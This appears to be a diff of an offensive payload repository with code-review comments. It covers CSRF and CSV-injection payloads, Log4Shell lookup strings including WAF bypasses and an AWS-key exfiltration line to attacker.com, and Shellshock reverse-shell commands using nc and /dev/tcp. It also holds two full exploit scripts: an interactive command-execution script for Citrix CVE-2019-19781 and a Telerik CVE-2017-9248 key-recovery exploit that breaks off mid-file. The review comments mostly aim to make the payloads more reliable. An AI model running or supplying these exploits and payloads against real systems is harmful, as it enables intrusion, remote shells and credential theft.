* [Payloads](#payloads) * [Payloads](#payloads)
* [HTML GET - Requiring User Interaction](#) * [HTML GET - Requiring User Interaction](#html-get---requiring-user-interaction)
* [HTML GET - No User Interaction)](#) * [HTML GET - No User Interaction)](#html-get---no-user-interaction)
* [HTML POST - Requiring User Interaction](#) * [HTML POST - Requiring User Interaction](#html-post---requiring-user-interaction)
* [HTML POST - AutoSubmit - No User Interaction](#) * [HTML POST - AutoSubmit - No User Interaction](#html-post---autosubmit---no-user-interaction)
* [JSON GET - Simple Request](#) * [HTML POST - multipart/form-data with file upload - Requiring User Interaction](#html-post---multipartform-data-with-file-upload---requiring-user-interaction)
* [JSON POST - Simple Request](#) * [JSON GET - Simple Request](#json-get---simple-request)
* [JSON POST - Complex Request](#) * [JSON POST - Simple Request](#json-post---simple-request)
* [JSON POST - Complex Request](#json-post---complex-request)
* [Bypass referer header validation check](#bypass-referer-header-validation)
* [Basic payload](#basic-payload)
* [With question mark payload](#with-question-mark-payload)
* [With semicolon payload](#with-semicolon-payload)
* [With subdomain payload](#with-subdomain-payload)
* [Labs](#labs)
* [References](#references)
## Tools ## Tools
* [XSRFProbe - The Prime Cross Site Request Forgery Audit and Exploitation Toolkit.](https://github.com/0xInfection/XSRFProbe) * [XSRFProbe - The Prime Cross Site Request Forgery Audit and Exploitation Toolkit.](https://github.com/0xInfection/XSRFProbe)
## Methodology ## Methodology
![CSRF_cheatsheet](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CSRF%20Injection/Images/CSRF-CheatSheet.png?raw=true) ![CSRF_cheatsheet](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CSRF%20Injection/Images/CSRF-CheatSheet.png?raw=true)
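Review bot: the summary entry `* [HTML GET - No User Interaction)](#html-get---no-user-interaction)` keeps a stray `)` inside the link text in both the old and new column; drop it so the entry reads like the `### HTML GET - No User Interaction` heading it points to. Replacing the old `(#)` placeholders with real anchors is the right fix for the rest of the list.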
@@ -27,18 +38,21 @@
When you are logged in to a certain site, you typically have a session. The identifier of that session is stored in a cookie in your browser, and is sent with every request to that site. Even if some other site triggers a request, the cookie is sent along with the request and the request is handled as if the logged in user performed it. When you are logged in to a certain site, you typically have a session. The identifier of that session is stored in a cookie in your browser, and is sent with every request to that site. Even if some other site triggers a request, the cookie is sent along with the request and the request is handled as if the logged in user performed it.
### HTML GET - Requiring User Interaction ### HTML GET - Requiring User Interaction
```html ```html
<a href="http://www.example.com/api/setusername?username=CSRFd">Click Me</a> <a href="http://www.example.com/api/setusername?username=CSRFd">Click Me</a>
``` ```
### HTML GET - No User Interaction ### HTML GET - No User Interaction
```html ```html
<img src="http://www.example.com/api/setusername?username=CSRFd"> <img src="http://www.example.com/api/setusername?username=CSRFd">
``` ```
### HTML POST - Requiring User Interaction ### HTML POST - Requiring User Interaction
```html ```html
@@ -48,6 +62,7 @@ When you are logged in to a certain site, you typically have a session. The iden
</form> </form>
``` ```
### HTML POST - AutoSubmit - No User Interaction ### HTML POST - AutoSubmit - No User Interaction
```html ```html
@@ -62,6 +77,28 @@ When you are logged in to a certain site, you typically have a session. The iden
``` ```
### HTML POST - multipart/form-data with file upload - Requiring User Interaction
```html
<script>
function launch(){
const dT = new DataTransfer();
const file = new File( [ "CSRF-filecontent" ], "CSRF-filename" );
dT.items.add( file );
document.xss[0].files = dT.files;
document.xss.submit()
}
</script>
<form style="display: none" name="xss" method="post" action="<target>" enctype="multipart/form-data">
<input id="file" type="file" name="file"/>
<input type="submit" name="" value="" size="0" />
</form>
<button value="button" onclick="launch()">Submit Request</button>
```
### JSON GET - Simple Request ### JSON GET - Simple Request
```html ```html
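Review bot: `document.xss[0].files = dT.files;` reaches the file input through legacy named-form access plus a positional index, which breaks silently if another input is placed before it; `document.forms.xss.elements.file.files` addresses the input by its `name` and is what the `id="file"`/`name="file"` attributes already set up. The `<target>` value in `action="<target>"` should be named in the text as the placeholder to replace, as the other payloads in this file do with `www.example.com`.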
@@ -72,8 +109,11 @@ xhr.send();
</script> </script>
``` ```
### JSON POST - Simple Request ### JSON POST - Simple Request
With XHR :
```html ```html
<script> <script>
var xhr = new XMLHttpRequest(); var xhr = new XMLHttpRequest();
@@ -87,6 +127,18 @@ xhr.send('{"role":admin}');
</script> </script>
``` ```
With autosubmit send form, which bypasses certain browser protections such as the Standard option of [Enhanced Tracking Protection](https://support.mozilla.org/en-US/kb/enhanced-tracking-protection-firefox-desktop?as=u&utm_source=inproduct#w_standard-enhanced-tracking-protection) in Firefox browser :
```html
<form id="CSRF_POC" action="www.example.com/api/setrole" enctype="text/plain" method="POST">
// this input will send : {"role":admin,"other":"="}
<input type="hidden" name='{"role":admin, "other":"' value='"}' />
</form>
<script>
document.getElementById("CSRF_POC").submit();
</script>
```
### JSON POST - Complex Request ### JSON POST - Complex Request
```html ```html
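Review bot: `action="www.example.com/api/setrole"` has no scheme, so the browser resolves it as a relative path on whatever page hosts the form and the POST never reaches the intended host; the other payloads in this file use `http://www.example.com/...`. Also, `// this input will send : {"role":admin,"other":"="}` is not an HTML comment and will render as visible text inside the form; use `<!-- ... -->` for the explanation.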
@@ -99,6 +151,51 @@ xhr.send('{"role":admin}');
</script> </script>
``` ```
## Bypass referer header validation
### Basic payload
```
1) Open https://attacker.com/csrf.html
2) Referer header is ..
Referer: https://attacker.com/csrf.html
```
### With question mark(`?`) payload
```
1) Open https://attacker.com/csrf.html?trusted.domain.com
2) Referer header is ..
Referer: https://attacker.com/csrf.html?trusted.domain.com
```
### With semicolon(`;`) payload
```
1) Open https://attacker.com/csrf.html;trusted.domain.com
2) Referer header is ..
Referer: https://attacker.com/csrf.html;trusted.domain.com
```
### With subdomain payload
```
1) Open https://trusted.domain.com.attacker.com/csrf.html
2) Referer headers is ..
Referer: https://trusted.domain.com.attacker.com/csrf.html
```
## Labs
* [CSRF vulnerability with no defenses](https://portswigger.net/web-security/csrf/lab-no-defenses)
* [CSRF where token validation depends on request method](https://portswigger.net/web-security/csrf/lab-token-validation-depends-on-request-method)
* [CSRF where token validation depends on token being present](https://portswigger.net/web-security/csrf/lab-token-validation-depends-on-token-being-present)
* [CSRF where token is not tied to user session](https://portswigger.net/web-security/csrf/lab-token-not-tied-to-user-session)
* [CSRF where token is tied to non-session cookie](https://portswigger.net/web-security/csrf/lab-token-tied-to-non-session-cookie)
* [CSRF where token is duplicated in cookie](https://portswigger.net/web-security/csrf/lab-token-duplicated-in-cookie)
* [CSRF where Referer validation depends on header being present](https://portswigger.net/web-security/csrf/lab-referer-validation-depends-on-header-being-present)
* [CSRF with broken Referer validation](https://portswigger.net/web-security/csrf/lab-referer-validation-broken)
## References ## References
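Review bot: the four Referer payloads should state which validation logic each one defeats: the `?`, `;` and subdomain cases only pass a check that looks for `trusted.domain.com` anywhere in the Referer string, and the basic case only passes a check that accepts an unrelated Referer; a comparison against the parsed host of the URL rejects all four. Saying so makes the section useful as a test plan rather than a list of strings. Minor: `Referer headers is ..` in the subdomain block should read `Referer header is ..` like the other three, and these fences lack a language tag while the rest of the file uses `html`.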
@@ -114,4 +211,5 @@ xhr.send('{"role":admin}');
- [Hacking Facebook accounts using CSRF in Oculus-Facebook integration](https://www.josipfranjkovic.com/blog/hacking-facebook-oculus-integration-csrf) - [Hacking Facebook accounts using CSRF in Oculus-Facebook integration](https://www.josipfranjkovic.com/blog/hacking-facebook-oculus-integration-csrf)
- [Cross site request forgery (CSRF) - Sjoerd Langkemper - Jan 9, 2019](http://www.sjoerdlangkemper.nl/2019/01/09/csrf/) - [Cross site request forgery (CSRF) - Sjoerd Langkemper - Jan 9, 2019](http://www.sjoerdlangkemper.nl/2019/01/09/csrf/)
- [Cross-Site Request Forgery Attack - PwnFunction](https://www.youtube.com/watch?v=eWEgUcHPle0) - [Cross-Site Request Forgery Attack - PwnFunction](https://www.youtube.com/watch?v=eWEgUcHPle0)
- [Wiping Out CSRF - Joe Rozner - Oct 17, 2017](#https://medium.com/@jrozner/wiping-out-csrf-ded97ae7e83f) - [Wiping Out CSRF - Joe Rozner - Oct 17, 2017](https://medium.com/@jrozner/wiping-out-csrf-ded97ae7e83f)
- [Bypass referer check logic for CSRF](https://www.hahwul.com/2019/10/11/bypass-referer-check-logic-for-csrf/)


@@ -1,6 +1,6 @@
# CSV Injection (Formula Injection) # CSV Injection
Many web applications allow the user to download content such as templates for invoices or user settings to a CSV file. Many users choose to open the CSV file in either Excel,Libre Office or Open Office. When a web application does not properly validate the contents of the CSV file, it could lead to contents of a cell or many cells being executed. Many web applications allow the user to download content such as templates for invoices or user settings to a CSV file. Many users choose to open the CSV file in either Excel, Libre Office or Open Office. When a web application does not properly validate the contents of the CSV file, it could lead to contents of a cell or many cells being executed.
## Exploit ## Exploit
@@ -20,6 +20,20 @@ DDE ("cmd";"/C calc";"!A0")A0
# msf smb delivery with rundll32 # msf smb delivery with rundll32
=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1 =cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1
# Prefix obfuscation and command chaining
=AAAA+BBBB-CCCC&"Hello"/12345&cmd|'/c calc.exe'!A
=cmd|'/c calc.exe'!A*cmd|'/c calc.exe'!A
+thespanishinquisition(cmd|'/c calc.exe'!A
= cmd|'/c calc.exe'!A
# Using rundll32 instead of cmd
=rundll32|'URL.dll,OpenURL calc.exe'!A
=rundll321234567890abcdefghijklmnopqrstuvwxyz|'URL.dll,OpenURL calc.exe'!A
# Using null characters to bypass dictionary filters. Since they are not spaces, they are ignored when executed.
= C m D | '/ c c al c . e x e ' ! A
``` ```
Technical Details of the above payload: Technical Details of the above payload:
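Review bot: the `Using null characters to bypass dictionary filters` example cannot be read back from the rendered page: the null bytes between the characters of `= C m D | '/ c c al c . e x e ' ! A` are displayed as spaces (or dropped entirely), so anyone copying the line gets a payload made of spaces, which the comment itself says is not what is meant. Show the bytes explicitly (for example as `\x00` escapes or a short hex dump) beside the rendered form so the example is reproducible.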
@@ -39,10 +53,11 @@ Any formula can be started with
## References ## References
* [OWASP - CSV Excel Macro Injection](https://owasp.org/index.php/CSV_Excel_Macro_Injection) * [OWASP - CSV Excel Macro Injection](https://owasp.org/www-community/attacks/CSV_Injection)
* [Google Bug Hunter University - CSV Excel formula injection](https://sites.google.com/site/bughunteruniversity/nonvuln/csv-excel-formula-injection) * [Google Bug Hunter University - CSV Excel formula injection](https://bughunters.google.com/learn/invalid-reports/google-products/4965108570390528/csv-formula-injection)
* [Comma Separated Vulnerabilities - James Kettle](https://www.contextis.com/resources/blog/comma-separated-vulnerabilities/)
* [CSV INJECTION: BASIC TO EXPLOIT!!!! - 30/11/2017 - Akansha Kesharwani](https://payatu.com/csv-injection-basic-to-exploit/) * [CSV INJECTION: BASIC TO EXPLOIT!!!! - 30/11/2017 - Akansha Kesharwani](https://payatu.com/csv-injection-basic-to-exploit/)
* [From CSV to Meterpreter - 5th November 2015 - Adam Chester](https://blog.xpnsec.com/from-csv-to-meterpreter/) * [From CSV to Meterpreter - 5th November 2015 - Adam Chester](https://blog.xpnsec.com/from-csv-to-meterpreter/)
* [CSV Injection -> Meterpreter on Pornhub - @ZephrFish Andy](https://news.webamooz.com/wp-content/uploads/bot/offsecmag/147.pdf) * [The Absurdly Underestimated Dangers of CSV Injection - 7 October, 2017 - George Mauer](http://georgemauer.net/2017/10/07/csv-injection.html)
* [The Absurdly Underestimated Dangers of CSV Injection - 7 October, 2017 - George Mauer](http://georgemauer.net/2017/10/07/csv-injection.html) * [Three New DDE Obfuscation Methods](https://blog.reversinglabs.com/blog/cvs-dde-exploits-and-obfuscation)
* [Your Excel Sheets Are Not Safe! Here's How to Beat CSV Injection](https://www.we45.com/post/your-excel-sheets-are-not-safe-heres-how-to-beat-csv-injection)


@@ -0,0 +1,51 @@
#!/usr/bin/env python
# https://github.com/mpgn/CVE-2019-19781
# # #
import requests
import string
import random
import re
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
print("CVE-2019-19781 - Remote Code Execution in Citrix Application Delivery Controller and Citrix Gateway")
print("Found by Mikhail Klyuchnikov")
print("")
if len(sys.argv) < 2:
print("[-] No URL provided")
sys.exit(0)
while True:
try:
command = input("command > ")
random_xml = ''.join(random.choices(string.ascii_uppercase + string.digits, k=12))
print("[+] Adding bookmark", random_xml + ".xml")
burp0_url = sys.argv[1] + "/vpn/../vpns/portal/scripts/newbm.pl"
burp0_headers = {"NSC_USER": "../../../../netscaler/portal/templates/" +
random_xml, "NSC_NONCE": "c", "Connection": "close"}
burp0_data = {"url": "http://exemple.com", "title": "[%t=template.new({'BLOCK'='print `" + str(command) + "`'})%][ % t % ]", "desc": "test", "UI_inuse": "RfWeb"}
r = requests.post(burp0_url, headers=burp0_headers, data=burp0_data,verify=False)
if r.status_code == 200:
print("[+] Bookmark added")
else:
print("\n[-] Target not vulnerable or something went wrong")
sys.exit(0)
burp0_url = sys.argv[1] + "/vpns/portal/" + random_xml + ".xml"
burp0_headers = {"NSC_USER": "../../../../netscaler/portal/templates/" +
random_xml, "NSC_NONCE": "c", "Connection": "close"}
r = requests.get(burp0_url, headers=burp0_headers,verify=False)
replaced = re.sub('^&#.*&#10;$', '', r.text, flags=re.MULTILINE)
print("[+] Result of the command: \n")
print(replaced)
except KeyboardInterrupt:
print("Exiting...")
break
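Review bot: the shebang `#!/usr/bin/env python` together with `input(...)` is a Python 2 hazard, since Python 2's `input()` evaluates whatever is typed; the script otherwise relies on Python 3 (`random.choices`, `print()` as a function), so the shebang should say `python3`. Both error paths (`[-] No URL provided` and `[-] Target not vulnerable or something went wrong`) call `sys.exit(0)`, which reports success to the caller; use a non-zero status. `"http://exemple.com"` in `burp0_data` looks like a typo for `example.com`.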

CVE Exploits/Log4Shell.md Normal file

@@ -0,0 +1,105 @@
# CVE-2021-44228 Log4Shell
> Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled
## Summary
* [Vulnerable code](#vulnerable-code)
* [Payloads](#payloads)
* [Scanning](#scanning)
* [WAF Bypass](#waf-bypass)
* [Exploitation](#exploitation)
* [Environment variables exfiltration](#environment-variables-exfiltration)
* [Remote Command Execution](#remote-command-execution)
* [References](#references)
## Vulnerable code
You can reproduce locally with: `docker run --name vulnerable-app -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app` using [christophetd/log4shell-vulnerable-app](https://github.com/christophetd/log4shell-vulnerable-app) or [leonjza/log4jpwn](
https://github.com/leonjza/log4jpwn)
```java
public String index(@RequestHeader("X-Api-Version") String apiVersion) {
logger.info("Received a request for API version " + apiVersion);
return "Hello, world!";
}
```
## Payloads
```bash
# Identify Java version and hostname
${jndi:ldap://${java:version}.domain/a}
${jndi:ldap://${env:JAVA_VERSION}.domain/a}
${jndi:ldap://${sys:java.version}.domain/a}
${jndi:ldap://${sys:java.vendor}.domain/a}
${jndi:ldap://${hostName}.domain/a}
${jndi:dns://${hostName}.domain}
# More enumerations keywords and variables
java:os
docker:containerId
web:rootDir
bundle:config:db.password
```
## Scanning
* [log4j-scan](https://github.com/fullhunt/log4j-scan)
```powershell
usage: log4j-scan.py [-h] [-u URL] [-l USEDLIST] [--request-type REQUEST_TYPE] [--headers-file HEADERS_FILE] [--run-all-tests] [--exclude-user-agent-fuzzing]
[--wait-time WAIT_TIME] [--waf-bypass] [--dns-callback-provider DNS_CALLBACK_PROVIDER] [--custom-dns-callback-host CUSTOM_DNS_CALLBACK_HOST]
python3 log4j-scan.py -u http://127.0.0.1:8081 --run-all-test
python3 log4j-scan.py -u http://127.0.0.1:808 --waf-bypass
```
* [Nuclei Template](https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/master/cves/2021/CVE-2021-44228.yaml)
## WAF Bypass
```powershell
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1:1389/a}
# using lower and upper
${${lower:jndi}:${lower:rmi}://127.0.0.1:1389/poc}
${j${loWer:Nd}i${uPper::}://127.0.0.1:1389/poc}
${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce}
# using env to create the letter
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a}
${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a}
```
## Exploitation
### Environment variables exfiltration
```powershell
${jndi:ldap://${env:USER}.${env:USERNAME}.attacker.com:1389/
# AWS Access Key
${jndi:ldap://${env:USER}.${env:USERNAME}.attacker.com:1389/${env:AWS_ACCESS_KEY_ID}/${env:AWS_SECRET_ACCESS_KEY}
```
### Remote Command Execution
* [rogue-jndi - @artsploit](https://github.com/artsploit/rogue-jndi)
```ps1
java -jar target/RogueJndi-1.1.jar --command "touch /tmp/toto" --hostname "192.168.1.21"
Mapping ldap://192.168.1.10:1389/ to artsploit.controllers.RemoteReference
Mapping ldap://192.168.1.10:1389/o=reference to artsploit.controllers.RemoteReference
Mapping ldap://192.168.1.10:1389/o=tomcat to artsploit.controllers.Tomcat
Mapping ldap://192.168.1.10:1389/o=groovy to artsploit.controllers.Groovy
Mapping ldap://192.168.1.10:1389/o=websphere1 to artsploit.controllers.WebSphere1
Mapping ldap://192.168.1.10:1389/o=websphere1,wsdl=* to artsploit.controllers.WebSphere1
Mapping ldap://192.168.1.10:1389/o=websphere2 to artsploit.controllers.WebSphere2
Mapping ldap://192.168.1.10:1389/o=websphere2,jar=* to artsploit.controllers.WebSphere2
```
* [JNDI-Exploit-Kit - @pimps](https://github.com/pimps/JNDI-Exploit-Kit)
## References
* [Log4Shell: RCE 0-day exploit found in log4j 2, a popular Java logging package - December 12, 2021](https://www.lunasec.io/docs/blog/log4j-zero-day/)
* [Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) - December 14, 2021](https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/)
* [PSA: Log4Shell and the current state of JNDI injection - December 10, 2021](https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/)
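Review bot: several copy errors in this new file. The `leonjza/log4jpwn` link is split across two lines inside its parentheses, so the markdown link will not render. In the Scanning block the usage text advertises `--run-all-tests` while the example runs `--run-all-test`, and the second example targets port `808` where the first uses `8081`. The first line of the environment-variables block, `${jndi:ldap://${env:USER}.${env:USERNAME}.attacker.com:1389/`, is missing its closing `}` (the line below it is complete). The `powershell` fence tags on blocks that contain `python3` commands and Log4j lookup strings should be `bash` or plain text, as the Payloads block already is.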


@@ -1,29 +1,71 @@
# Common Vulnerabilities and Exposures # Common Vulnerabilities and Exposures
Big CVEs in the last 5 years. ## Tools
## CVE-2014-0160 - Heartbleed - [Trickest CVE Repository - Automated collection of CVEs and PoC's](https://github.com/trickest/cve)
- [Nuclei Templates - Community curated list of templates for the nuclei engine to find security vulnerabilities in applications](https://github.com/projectdiscovery/nuclei-templates)
- [Metasploit Framework](https://github.com/rapid7/metasploit-framework)
- [CVE Details - The ultimate security vulnerability datasource](https://www.cvedetails.com)
The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. SSL/TLS provides communication security and privacy over the Internet for applications such as web, email, instant messaging (IM) and some virtual private networks (VPNs).
## CVE-2014-6271 - Shellshock ## Big CVEs in the last 5 years.
Shellshock, also known as Bashdoor is a family of security bug in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system. ### CVE-2017-0144 - EternalBlue
```bash EternalBlue exploits a vulnerability in Microsoft's implementation of the Server Message Block (SMB) protocol. The vulnerability exists because the SMB version 1 (SMBv1) server in various versions of Microsoft Windows mishandles specially crafted packets from remote attackers, allowing them to execute arbitrary code on the target computer.
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 192.168.0.XX 4444 -e /bin/sh\r\n
```
## CVE-2017-5638 - Apache Struts 2 Afftected systems:
- Windows Vista SP2
- Windows Server 2008 SP2 and R2 SP1
- Windows 7 SP1
- Windows 8.1
- Windows Server 2012 Gold and R2
- Windows RT 8.1
- Windows 10 Gold, 1511, and 1607
- Windows Server 2016
### CVE-2017-5638 - Apache Struts 2
On March 6th, a new remote code execution (RCE) vulnerability in Apache Struts 2 was made public. This recent vulnerability, CVE-2017-5638, allows a remote attacker to inject operating system commands into a web application through the “Content-Type” header. On March 6th, a new remote code execution (RCE) vulnerability in Apache Struts 2 was made public. This recent vulnerability, CVE-2017-5638, allows a remote attacker to inject operating system commands into a web application through the “Content-Type” header.
## CVE-2018-7600 - Drupalgeddon 2 ### CVE-2018-7600 - Drupalgeddon 2
A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised. A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised.
### CVE-2019-0708 - BlueKeep
A remote code execution vulnerability exists in Remote Desktop Services formerly known as Terminal Services when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.
### CVE-2019-19781 - Citrix ADC Netscaler
A remote code execution vulnerability in Citrix Application Delivery Controller (ADC) formerly known as NetScaler ADC and Citrix Gateway formerly known as NetScaler Gateway that, if exploited, could allow an unauthenticated attacker to perform arbitrary code execution.
Affected products:
- Citrix ADC and Citrix Gateway version 13.0 all supported builds
- Citrix ADC and NetScaler Gateway version 12.1 all supported builds
- Citrix ADC and NetScaler Gateway version 12.0 all supported builds
- Citrix ADC and NetScaler Gateway version 11.1 all supported builds
- Citrix NetScaler ADC and NetScaler Gateway version 10.5 all supported builds
## Older, but not forgotten
### CVE-2014-0160 - Heartbleed
The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. SSL/TLS provides communication security and privacy over the Internet for applications such as web, email, instant messaging (IM) and some virtual private networks (VPNs).
### CVE-2014-6271 - Shellshock
Shellshock, also known as Bashdoor is a family of security bug in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system.
```powershell
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 10.0.0.2 4444 -e /bin/sh\r\n"
curl --silent -k -H "User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.0.0.2/4444 0>&1" "https://10.0.0.1/cgi-bin/admin.cgi"
```
## Thanks to ## Thanks to
* [Heartbleed - Official website](http://heartbleed.com) * [Heartbleed - Official website](http://heartbleed.com)
* [Shellshock - Wikipedia](https://en.wikipedia.org/wiki/Shellshock_(software_bug)) * [Shellshock - Wikipedia](https://en.wikipedia.org/wiki/Shellshock_(software_bug))
* [Imperva Apache Struts analysis](https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/) * [Imperva Apache Struts analysis](https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/)
* [EternalBlue - Wikipedia](https://en.wikipedia.org/wiki/EternalBlue)
* [BlueKeep - Microsoft](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708)
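Review bot: `Afftected systems:` is a typo for `Affected systems:`, and the new heading `## Big CVEs in the last 5 years.` should drop the trailing period to match the other headings. The Shellshock block changed its fence from `bash` to `powershell` although both lines are `echo`/`curl` shell commands; keep `bash`. Closing the quote on the `echo -e "HEAD /cgi-bin/status ..."` line is correct, the old version left that string unterminated.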


@@ -0,0 +1,362 @@
# Author: Paul Taylor / @bao7uo
# https://github.com/bao7uo/dp_crypto/blob/master/dp_crypto.py
# dp_crypto - CVE-2017-9248 exploit
# Telerik.Web.UI.dll Cryptographic compromise
# Warning - no cert warnings,
# and verify = False in code below prevents verification
import sys
import base64
import requests
import re
import binascii
import argparse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
requests_sent = 0
char_requests = 0
def getProxy(proxy):
return { "http" : proxy, "https" : proxy }
def get_result(plaintext, key, session, pad_chars):
global requests_sent, char_requests
url = args.url
base_pad = (len(key) % 4)
base = '' if base_pad == 0 else pad_chars[0:4 - base_pad]
dp_encrypted = base64.b64encode(
(encrypt(plaintext, key) + base).encode()
).decode()
request = requests.Request('GET', url + '?dp=' + dp_encrypted)
request = request.prepare()
response = session.send(request, verify=False, proxies = getProxy(args.proxy))
requests_sent += 1
char_requests += 1
match = re.search("(Error Message:)(.+\n*.+)(</div>)", response.text)
return True \
if match is not None \
and match.group(2) == args.oracle \
else False
def test_keychar(keychar, found, session, pad_chars):
base64chars = [
"A", "Q", "g", "w", "B", "R", "h", "x", "C", "S", "i", "y",
"D", "T", "j", "z", "E", "U", "k", "0", "F", "V", "l", "1",
"G", "W", "m", "2", "H", "X", "n", "3", "I", "Y", "o", "4",
"J", "Z", "p", "5", "K", "a", "q", "6", "L", "b", "r", "7",
"M", "c", "s", "8", "N", "d", "t", "9", "O", "e", "u", "+",
"P", "f", "v", "/"
]
duff = False
accuracy_thoroughness_threshold = args.accuracy
for bc in range(int(accuracy_thoroughness_threshold)):
# ^^ max is len(base64chars)
sys.stdout.write("\b\b" + base64chars[bc] + "]")
sys.stdout.flush()
if not get_result(
base64chars[0] * len(found) + base64chars[bc],
found + keychar, session, pad_chars
):
duff = True
break
return False if duff else True
def encrypt(dpdata, key):
encrypted = []
k = 0
for i in range(len(dpdata)):
encrypted.append(chr(ord(dpdata[i]) ^ ord(key[k])))
k = 0 if k >= len(key) - 1 else k + 1
return ''.join(str(e) for e in encrypted)
def mode_decrypt():
ciphertext = base64.b64decode(args.ciphertext).decode()
key = args.key
print(base64.b64decode(encrypt(ciphertext, key)).decode())
print("")
def mode_encrypt():
plaintext = args.plaintext
key = args.key
plaintext = base64.b64encode(plaintext.encode()).decode()
print(base64.b64encode(encrypt(plaintext, key).encode()).decode())
print("")
def test_keypos(key_charset, unprintable, found, session):
pad_chars = ''
for pad_char in range(256):
pad_chars += chr(pad_char)
for i in range(len(pad_chars)):
for k in range(len(key_charset)):
keychar = key_charset[k]
sys.stdout.write("\b"*6)
sys.stdout.write(
(
keychar
if unprintable is False
else '+'
) +
") [" + (
keychar
if unprintable is False
else '+'
) +
"]"
)
sys.stdout.flush()
if test_keychar(keychar, found, session, pad_chars[i] * 3):
return keychar
return False
def get_key(session):
global char_requests
found = ''
unprintable = False
key_length = args.key_len
key_charset = args.charset
if key_charset == 'all':
unprintable = True
key_charset = ''
for i in range(256):
key_charset += chr(i)
else:
if key_charset == 'hex':
key_charset = '01234567890ABCDEF'
print("Attacking " + args.url)
print(
"to find key of length [" +
str(key_length) +
"] with accuracy threshold [" +
str(args.accuracy) +
"]"
)
print(
"using key charset [" +
(
key_charset
if unprintable is False
else '- all ASCII -'
) +
"]\n"
)
for i in range(int(key_length)):
pos_str = (
str(i + 1)
if i > 8
else "0" + str(i + 1)
)
sys.stdout.write("Key position " + pos_str + ": (------")
sys.stdout.flush()
keychar = test_keypos(key_charset, unprintable, found, session)
if keychar is not False:
found = found + keychar
sys.stdout.write(
"\b"*7 + "{" +
(
keychar
if unprintable is False
else '0x' + binascii.hexlify(keychar.encode()).decode()
) +
"} found with " +
str(char_requests) +
" requests, total so far: " +
str(requests_sent) +
"\n"
)
sys.stdout.flush()
char_requests = 0
else:
sys.stdout.write("\b"*7 + "Not found, quitting\n")
sys.stdout.flush()
break
if keychar is not False:
print("Found key: " +
(
found
if unprintable is False
else "(hex) " + binascii.hexlify(found.encode()).decode()
)
)
print("Total web requests: " + str(requests_sent))
return found
def mode_brutekey():
session = requests.Session()
found = get_key(session)
if found == '':
return
else:
urls = {}
url_path = args.url
params = (
'?DialogName=DocumentManager' +
'&renderMode=2' +
'&Skin=Default' +
'&Title=Document%20Manager' +
'&dpptn=' +
'&isRtl=false' +
'&dp='
)
versions = [
'2007.1423', '2007.1521', '2007.1626', '2007.2918',
'2007.21010', '2007.21107', '2007.31218', '2007.31314',
'2007.31425', '2008.1415', '2008.1515', '2008.1619',
'2008.2723', '2008.2826', '2008.21001', '2008.31105',
'2008.31125', '2008.31314', '2009.1311', '2009.1402',
'2009.1527', '2009.2701', '2009.2826', '2009.31103',
'2009.31208', '2009.31314', '2010.1309', '2010.1415',
'2010.1519', '2010.2713', '2010.2826', '2010.2929',
'2010.31109', '2010.31215', '2010.31317', '2011.1315',
'2011.1413', '2011.1519', '2011.2712', '2011.2915',
'2011.31115', '2011.3.1305', '2012.1.215', '2012.1.411',
'2012.2.607', '2012.2.724', '2012.2.912', '2012.3.1016',
'2012.3.1205', '2012.3.1308', '2013.1.220', '2013.1.403',
'2013.1.417', '2013.2.611', '2013.2.717', '2013.3.1015',
'2013.3.1114', '2013.3.1324', '2014.1.225', '2014.1.403',
'2014.2.618', '2014.2.724', '2014.3.1024', '2015.1.204',
